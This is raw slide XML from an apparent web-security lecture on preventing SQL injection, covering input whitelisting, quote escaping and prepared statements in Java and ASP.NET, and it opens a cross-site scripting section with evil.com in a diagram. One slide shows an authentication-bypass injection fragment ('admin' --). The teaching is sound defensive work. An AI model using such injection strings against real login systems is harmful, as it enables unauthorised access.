              <a:t>WHERE uname=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin’ --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF3399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution: treat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> parameters as dangerous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8FAC03-BA35-C04F-A596-5F8BAC8D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7FC024CC-8BE9-9443-99EA-1EA490A8BF69}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>41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7702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D296D5FD-354D-A440-A53A-5A3FFC137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Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6349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135D917-11A5-DF41-BDF5-A30A8F90B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153400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Validate all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Whitelist permitted characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Blacklisting “bad” characters doesn’t work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Allow only well-defined set of safe values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D255D08C-3412-8C41-A75B-9F1CFAC3037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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52D1E2D7-9067-1349-95CC-20FE9EF9C655}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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42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6059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BA9DF93-61E7-154E-9292-A567AE6C2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Escaping Quotes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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72A5FB8-C798-8A4B-85A9-14FA35034B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 characters such as ’ provide distinction between data and code in queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For valid string inputs containing quotes, use escape characters to prevent the quotes from becoming part of the query code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Different databases have different rules for escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>o’connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = o\’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                 escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>o’connor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = o’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256F2BE4-D5D2-464E-B855-494A9E2237EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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8E75DB0F-0CE7-4D4E-A8D9-B3FF1357BD37}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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43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7869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8767D175-632A-4C41-B433-B91FEA851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Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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43C3D2C-44D1-5B48-94AF-9F38CD6BD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178800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>In most injection attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data are interpreted as code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> – this changes the semantics of a query or command generated by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: placeholders guaranteed to be data (not code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>allow creation of static queries with bind variables; this preserves the structure of the intended query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1138D08D-D253-4749-8758-1BF110348BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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C31FED80-C652-3444-895C-12FFA3DC1100}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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44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6597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5787F8E9-9A97-7D44-9442-1B3D4466D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Prepared Statement: Example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B7C9F674-B827-E343-8879-711CEC7AF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6" y="1945948"/>
            <a:ext cx="8601075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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PreparedStatement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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("SELECT pizza, toppings, quantity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order_day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                        + "FROM orders WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.getCurrentUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer.parseInt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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParamenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("month")));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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A584AB28-02E0-5D46-A391-01EF16EA2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711576"/>
            <a:ext cx="2286000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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind variable (data placeholder)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46528657-3214-5C40-8CE4-32604B2ABB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48875" y="2970214"/>
            <a:ext cx="0" cy="776287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Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{159BCE4B-58C5-9B44-9ADD-0F4F21FD0C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34289" y="3244850"/>
            <a:ext cx="2414587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Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F061C6-B827-EB47-9505-14E3BFA5A0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2936875"/>
            <a:ext cx="0" cy="30638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Rectangle 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6EFDC13-F7AE-7B44-93F4-6699DEDE9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4752976"/>
            <a:ext cx="7543800" cy="1952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Query is parsed without data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Bind variables are typed (int, string, …)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But beware of second-order SQL injection… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66569" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124D0EF9-4C3C-7B48-8D42-17D0AB2D3F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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F3C2681A-B7DF-C54F-A05A-4E0A5A0D0FEC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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45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6570" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FB9AAC-63F7-5F48-90ED-D0F554A0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414" y="1185864"/>
            <a:ext cx="6224587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http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41904359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F2A8C49-1B95-8044-842A-6DF5B5B63E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Builds SQL queries by properly escaping args</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Replaces  ′  with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   \′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SqlCommand cmd = new SqlCommand( </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	“SELECT * FROM UserTable WHERE 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, dbConnection);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	cmd.Parameters.Add(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, Request[“user”] );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	cmd.Parameters.Add(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, Request[“pwd”] );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	cmd.ExecuteReader(); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC81790-2C07-6548-863D-E1A829B1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Parameterized SQL in ASP.NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD13B0E-8BA4-2747-8453-F67A544A6806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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58D983C8-B1F8-3442-9DA0-CB29DE1F1066}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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46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6555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771F-7663-6746-B4F3-0E38C34F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98460-94F9-6842-BDB6-E4AAECF76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XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Server side web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36198121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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C6AACD-2FEE-E644-A3DC-328619C6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1AAB27A0-45F1-924A-AA75-B0B846C7A106}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>48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8F3BA8E5-1AA1-5F4C-95D1-6F20D26795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0400" y="228600"/>
            <a:ext cx="8356600" cy="9144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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B727282-4655-4342-AD81-FD740511E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242050"/>
            <a:ext cx="28194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victim’s browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70661" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282B7E54-2B51-6E4D-B9FF-59CDDFA39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1905000"/>
            <a:ext cx="15509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naive.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258501" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1FE452-1188-C045-AC74-0C31A407C6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2422526"/>
            <a:ext cx="2819400" cy="3206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8502" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C695A2F-BEE1-3E4D-AFCE-FE0CCDCA0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2362201"/>
            <a:ext cx="91281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0664" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F6E521-89FA-DB46-ADA6-1A832C99D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438401"/>
            <a:ext cx="838200" cy="3794125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0665" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A64995-4432-CD4E-8C5E-58DCF4A6E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4" y="2038351"/>
            <a:ext cx="12906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evil.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70666" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD2C2D5-22D1-454C-A94F-CE46FD804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438401"/>
            <a:ext cx="609600" cy="3794125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0667" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B0EBD59-032B-CB45-8311-1775A3013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2378076"/>
            <a:ext cx="838200" cy="3794125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F4C83CDC-3FAE-604B-97C9-8BD64D6A26FB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895600"/>
            <a:ext cx="2895600" cy="381000"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70696" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9BBC6C7-B793-444B-81A1-84274C76F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1920"/>
              <a:ext cx="1824" cy="1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Text Box 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F69D51-D1A4-F845-8A3F-3B9CC5B06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824"/>
              <a:ext cx="1168" cy="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1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Access some web page</a:t>
              </a:r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C673F6BC-EEA4-7847-8C64-B0904067D3A5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352799"/>
            <a:ext cx="2895600" cy="996950"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="628"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70694" name="Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB9FC2B-295A-0A45-987A-4253E1593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208"/>
              <a:ext cx="1824" cy="1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Text Box 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92B2FF1-55C3-EF46-AFA1-088643130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112"/>
              <a:ext cx="1584" cy="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buFontTx/>
                <a:buNone/>
                <a:defRPr/>
